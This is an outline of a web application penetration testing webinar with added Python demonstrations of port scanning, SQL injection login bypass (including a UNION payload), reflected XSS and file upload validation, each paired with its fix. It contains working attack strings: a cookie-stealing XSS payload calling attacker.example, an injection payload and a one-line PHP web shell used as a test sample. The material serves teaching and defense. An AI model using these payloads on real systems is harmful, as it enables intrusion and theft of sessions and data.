The document outlines a webinar on web application penetration testing by C. Vishwanath, covering various aspects of hacking and ethical hacking. It details the penetration testing process, security vulnerabilities such as SQL injection, Cross-Site Scripting (XSS), and authentication bypass, along with countermeasures to mitigate these risks. The presentation emphasizes the importance of identifying exploitable vulnerabilities in applications to protect sensitive data from potential attackers.
Who am I
I'm C Vishwanath [Certified Ethical Hacker]
Senior Operational Professional in IBM
Cyber Security Researcher and Trainer
Founder of E-hacking4all
My Blog: www.e-hacking4all.blogspot.in
Contact: Google my Name
What Is Hacking
Hacking is the process of attempting to gain unauthorized access to computer resources. When the same techniques are applied with the owner's permission, for the purpose of helping to secure the system, the activity is called ethical hacking.
Hacking v/s Ethical Hacking
Hacker:
• Accesses a computer system or network without authorization
• Breaks the law
Ethical Hacker:
• Performs most of the same activities, but with the owner's permission
• Employed by companies to perform penetration tests
Web Application Penetration Testing
The primary objective of a web application penetration test (WAPT) is to identify exploitable vulnerabilities, weaknesses and technical flaws in applications before attackers are able to discover and exploit them. Web application penetration testing reveals the real-world opportunities an attacker could use to compromise an application in order to gain access to sensitive data, or even to take over the underlying systems for malicious, non-business purposes.
Penetration Testing
The security testing methodology we follow to minimize the risk of security breaches and improve the security posture of your applications combines a series of signature tools and techniques with manually executed test techniques that attempt to breach your application systems.
Steps in Penetration Testing
Foot Printing
• Foot printing is the process of collecting as much information as possible about the target, in order to identify the various ways of intruding into the organization's network and systems
• Attackers gather publicly available sensitive information
• Sources:
WHOIS (domain registration records)
Netcraft
Google hacking (sensitive information gathering through search operators)
OSINT Framework
Scanning
• Network scanning refers to the set of procedures for identifying hosts, ports and services in a network
• Objectives of scanning:
Discover live hosts, IP addresses and open ports
Discover the operating system and system architecture
Identify the services running on each host
• Sources:
Nmap tool
Shodan.io
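What a scanner like Nmap does for the "open ports and services" objective above is, at its simplest, a TCP connect() probe followed by reading whatever the service says first. The example below is added here to show that mechanism and is not code from the slides or from Nmap: it starts a throwaway listener on the loopback interface (the service banner it sends is constructed for the demo) and then scans a handful of ports against it, classifying each as open, closed or filtered. Against a real target, a connect scan is the equivalent of `nmap -sT -sV -p- <host>`; only ever scan hosts that are in scope for the engagement.

```python
"""TCP connect() port scan with banner grabbing (added example, not from the slides)."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed service banner sent by the local test listener below; it stands in
# for whatever a real service on the target would say on connect.
FAKE_BANNER = b"SSH-2.0-OpenSSH_9.6 (example listener)\r\n"


def start_listener(host="127.0.0.1"):
    """Start a throwaway TCP server on an OS-chosen port so the scan has a known-open
    target to find. Returns the bound socket; read its port via getsockname()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listener was closed
                return
            with conn:
                conn.sendall(FAKE_BANNER)

    threading.Thread(target=serve, daemon=True).start()
    return srv


def free_closed_port(host="127.0.0.1"):
    """Bind and immediately release a port so the demo has a port known to be closed."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind((host, 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def probe(host, port, timeout=1.0):
    """Probe one port. A completed TCP handshake means 'open'; an RST (connection
    refused) means 'closed'; a timeout usually means a firewall is dropping the
    packets, i.e. 'filtered'. Returns (port, state, banner)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256).decode("utf-8", errors="replace").strip()
            except (socket.timeout, OSError):
                banner = ""  # open but silent (e.g. HTTP waits for a request first)
            return port, "open", banner
    except ConnectionRefusedError:
        return port, "closed", ""
    except (socket.timeout, OSError):
        return port, "filtered", ""


def scan(host, ports, workers=32):
    """Scan a list of ports concurrently; return {port: banner} for open ports only."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p), ports))
    return {port: banner for port, state, banner in results if state == "open"}


if __name__ == "__main__":
    listener = start_listener()
    target_port = listener.getsockname()[1]
    # Scan the web ports named on the slides plus a window around the demo listener.
    found = scan("127.0.0.1", [80, 443, target_port - 1, target_port, target_port + 1])
    for port, banner in sorted(found.items()):
        print(f"{port}/tcp open  {banner or '(no banner)'}")
    listener.close()
```

The three states are the important part for a tester: a "filtered" result on 80 or 443 from the outside, but "open" from inside the DMZ, tells you where the firewall boundary sits; the banner tells you which product to look up for known weaknesses.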
Web Application: Breaching the Perimeter
(Architecture diagram; only the recoverable content is kept.) Browser → Internet → DMZ → Trusted Inside → Corporate Inside, over HTTP(S):
• The perimeter firewall allows only HTTP (port 80) and HTTPS (port 443) through to the web server (IIS, SunOne, Apache).
• The next firewall allows only the applications on the web server to talk to the application server (ASP, .NET, WebSphere, Java).
• The inner firewall allows only the application server to talk to the database server (SQL, Oracle, DB2).
Even with all three firewalls in place, HTTP(S) traffic from the browser is allowed all the way to the web application, which is why a flaw in that application can breach the perimeter.
Bypass Authentication
An authentication bypass vulnerability could allow attackers to perform various malicious operations by bypassing the application's authentication mechanism.
What's the issue: an authentication bypass exploit is mainly due to a weak authentication mechanism.
Bypass Authentication
Countermeasures for Bypass Authentication:
1. To stay protected from authentication bypass attacks, keep all your systems, applications, software and OS up to date.
2. Do not expose the authentication logic in client-side browser script; every authentication and authorization check must be enforced on the server.
3. Protect user session IDs and cookies: generate session IDs from a cryptographically secure random source, transmit them only over TLS, and mark the cookies Secure and HttpOnly.
4. Validate all user input on the server side.
SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
SQL Injection
Countermeasures for SQL Injection:
1. Source code review
2. Use parameterized queries (prepared statements) so that user input is passed to the database as data and never concatenated into the query text; sanitize and validate input fields as defense in depth
3. Check the privileges of the user's connection to the database
4. Apply the least-privilege rule to the account the application uses to access the database (applications are often run with admin privileges by default, which is not advisable)
5. Use IDS and IPS, for example Snort (IDS: intrusion detection system; IPS: intrusion prevention system)
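The authentication bypass slide and the SQL injection slides describe the same failure from two sides: a login query built by string concatenation lets the attacker rewrite the query, so the "weak authentication mechanism" is often just an injectable one. The example below is added here to show that, and is not code from the slides: it builds a constructed in-memory SQLite database with one hypothetical account (alice / "correct horse", stored as a salted PBKDF2 hash), a vulnerable login and the parameterized fix from countermeasure 2. It also goes one step beyond the usual `' OR 1=1--` demonstration: because the password is verified in application code against the hash the query returns, the tautology alone fails, but a UNION that supplies an attacker-computed salt and hash still logs in as admin. The `eve` account and `letmein` password in the payload are the attacker's own choices for the demo.

```python
"""Authentication bypass through SQL injection: a vulnerable login beside the
parameterized fix (added example, not from the slides)."""
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 100_000


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_db():
    """Constructed sample data: one account with a hypothetical password,
    stored as a salted PBKDF2 hash rather than in clear text."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, role TEXT, salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        ("alice", "admin", salt, hash_password("correct horse", salt)),
    )
    conn.commit()
    return conn


def verify(row, password):
    """Shared password check: constant-time comparison against the stored hash.
    Returns (username, role) on success, else None."""
    if row is None:
        return None
    username, role, salt, pw_hash = row
    if hmac.compare_digest(hash_password(password, salt), pw_hash):
        return username, role
    return None


def login_vulnerable(conn, username, password):
    """BAD: the username is concatenated into the SQL text, so it can rewrite the query."""
    sql = "SELECT username, role, salt, pw_hash FROM users WHERE username = '" + username + "'"
    return verify(conn.execute(sql).fetchone(), password)


def login_safe(conn, username, password):
    """GOOD: a parameterized query; the driver passes the username as data, never as SQL."""
    sql = "SELECT username, role, salt, pw_hash FROM users WHERE username = ?"
    return verify(conn.execute(sql, (username,)).fetchone(), password)


def union_payload(password):
    """Attacker side. The query's result feeds the password check, so the attacker
    does not need alice's password: a UNION injects a row whose salt and hash the
    attacker computed for a password of their own choosing."""
    salt = b"\x00" * 16
    return (
        "' UNION SELECT 'eve', 'admin', X'" + salt.hex()
        + "', X'" + hash_password(password, salt).hex() + "'--"
    )


def demo():
    conn = make_db()
    return {
        "normal_login": login_safe(conn, "alice", "correct horse"),
        # The classic tautology returns alice's row, but the hash check still fails...
        "tautology_vs_vulnerable": login_vulnerable(conn, "' OR 1=1--", "anything"),
        # ...while a UNION carrying attacker-controlled credentials logs in as admin.
        "union_vs_vulnerable": login_vulnerable(conn, union_payload("letmein"), "letmein"),
        # To the parameterized query both payloads are just usernames that do not exist.
        "tautology_vs_safe": login_safe(conn, "' OR 1=1--", "anything"),
        "union_vs_safe": login_safe(conn, union_payload("letmein"), "letmein"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:25s} -> {result}")
```

Two points worth taking from this: hashing passwords does not stop injection, it only changes the payload; and countermeasures 3 and 4 still matter even with parameterized queries, because the database account the application connects with bounds what any query, injected or not, can reach.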
Cross Site Scripting Vulnerability
Cross-site scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in the victim's web browser by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code.
How Cross-site Scripting Works
There are two stages to a typical XSS attack:
To run malicious JavaScript code in a victim's browser, an attacker must first find a way to inject malicious code (the payload) into a web page that the victim visits.
After that, the victim must visit the web page with the malicious code. If the attack is directed at particular victims, the attacker can use social engineering and/or phishing to send a malicious URL to the victim.
Cross-site Scripting
Countermeasures for Cross-site Scripting:
1. Don't trust any user input
2. Use escaping/encoding appropriate to the output context
3. Sanitize HTML
4. Set the HttpOnly flag on session cookies
5. Use a Content Security Policy
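The example below is added here to make countermeasures 2, 4 and 5 concrete; it is not code from the slides. It renders a search results page two ways, with the user's query concatenated straight into the HTML and with it encoded for the context it lands in (`html.escape` for the HTML body and attribute values, percent-encoding for the URL in the link), and builds the response headers that limit the damage when encoding is missed: `HttpOnly` keeps `document.cookie` from reading the session, and the Content-Security-Policy refuses inline script. The payload, the session ID and the `attacker.example` host are constructed for the demo; `would_execute` is a deliberately crude check used only to make the difference visible, not a detection you should rely on.

```python
"""Reflected XSS: unencoded output beside context-aware encoding, plus the HttpOnly
cookie and Content-Security-Policy headers (added example, not from the slides)."""
import html
import re
from urllib.parse import quote

# Constructed attacker payload: exfiltrates the session cookie with an image request
# to a hypothetical attacker-controlled host.
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def search_page_vulnerable(query):
    """BAD: user input is concatenated straight into the HTML body."""
    return f"<h1>Results for: {query}</h1><a href='/search?q={query}'>permalink</a>"


def search_page_safe(query):
    """GOOD: encode for each output context. html.escape covers the HTML body and
    quoted attribute values; data going into a URL needs percent-encoding instead."""
    text = html.escape(query, quote=True)
    url_param = quote(query, safe="")
    return f"<h1>Results for: {text}</h1><a href=\"/search?q={url_param}\">permalink</a>"


def security_headers(session_id):
    """Defense in depth for when an encoding is missed somewhere. HttpOnly keeps
    script from reading the session cookie; the CSP blocks inline <script> blocks and
    event handlers, and only allows scripts served from this origin."""
    return {
        "Set-Cookie": f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax",
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"
        ),
    }


# Crude demo-only heuristic for "does this markup still contain a script context?"
_SCRIPT_RE = re.compile(r"<script\b|\bon\w+\s*=|javascript:", re.IGNORECASE)


def would_execute(markup):
    return bool(_SCRIPT_RE.search(markup))


if __name__ == "__main__":
    print("vulnerable:", search_page_vulnerable(PAYLOAD))
    print("safe:      ", search_page_safe(PAYLOAD))
    for name, value in security_headers("constructed-session-id").items():
        print(f"{name}: {value}")
```

Encoding is context-dependent: the same characters that are harmless in an HTML text node are dangerous inside a `<script>` block or a `javascript:` URL, so "sanitize HTML" (countermeasure 3) is for the rare case where users are allowed to submit markup, and encoding at the point of output is the default.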
File Upload Vulnerability
Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code onto the system to be attacked; after that, the attacker only needs to find a way to get the code executed. A file upload helps the attacker accomplish the first step.
File Upload Vulnerability
Countermeasures for File Upload Vulnerability:
1. Only allow specific file types, by limiting the list of allowed file types
2. Verify file types: in addition to restricting the file types, ensure that no files are 'masking' as allowed file types (for example a script with an image extension)
3. Scan for malware: to minimize risk, all files should be scanned for malware
4. Use simple error messages: when displaying file upload errors, do not include directory paths, server configuration settings or stack traces
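The four countermeasures above fit into one upload handler, shown below as an added example (not code from the slides): an extension allow-list, a magic-bytes check so a PHP script named `shell.php.png` is rejected even though its extension is allowed, a server-generated filename so the client's path can never reach the filesystem, an optional scanner hook where an antivirus call would go (the hook and its signature are this example's own assumption), and a generic client-facing error while the real reason goes to a server-side log. The sample PNG header and PHP content are constructed inputs.

```python
"""File upload validation: extension allow-list, content check against masquerading,
server-chosen filenames and generic error messages (added example, not from the slides)."""
import os
import uuid

MAX_BYTES = 5 * 1024 * 1024

# Allowed extension -> magic bytes the content must start with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
GENERIC_ERROR = "The file could not be uploaded."

# Constructed sample inputs for the demo.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_SAMPLE = b"<?php system($_GET['cmd']); ?>"


class UploadRejected(Exception):
    """Carries the internal reason; the client only ever sees GENERIC_ERROR."""


def validate_upload(filename, data, scanner=None):
    """Return the server-chosen storage name or raise UploadRejected."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    # Keep only the last path component: '../../x.png' and 'C:\\x.png' become 'x.png'.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {ext!r}")
    # Countermeasure 2: the bytes must match the claimed type, not just the name.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected(f"content does not match extension {ext!r} (masquerading)")
    # Countermeasure 3: hypothetical hook; a real deployment calls an AV engine here.
    if scanner is not None and not scanner(data):
        raise UploadRejected("malware scan failed")
    # The stored name is ours, so double extensions and traversal in the original are moot.
    return f"{uuid.uuid4().hex}.{ext}"


def handle_upload(filename, data, scanner=None, log=None):
    """Countermeasure 4: detailed reason to the server log, generic message to the client."""
    try:
        stored = validate_upload(filename, data, scanner)
    except UploadRejected as exc:
        if log is not None:
            log.append(f"rejected {filename!r}: {exc}")
        return {"ok": False, "error": GENERIC_ERROR}
    return {"ok": True, "stored_as": stored}


if __name__ == "__main__":
    log = []
    for name, data in [("photo.png", PNG_SAMPLE), ("shell.php", PHP_SAMPLE),
                       ("shell.php.png", PHP_SAMPLE), ("../../var/www/x.png", PNG_SAMPLE)]:
        print(f"{name:22s} -> {handle_upload(name, data, log=log)}")
    print("server log:", log)
```

Two things this still does not do, and a production handler should: store uploads outside the web root (or in object storage) so the web server never executes them even if a check fails, and, for images, re-encode the file so that any payload embedded after a valid header is discarded.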
How to Secure Web Applications
• Incorporate security into the development lifecycle
• Integrate security into application requirements
• Include information security professionals in software architecture/design review
• Use security APIs and libraries (e.g. ESAPI, Validate, etc.) when possible
• Threat modeling
• Web application vulnerability assessment tools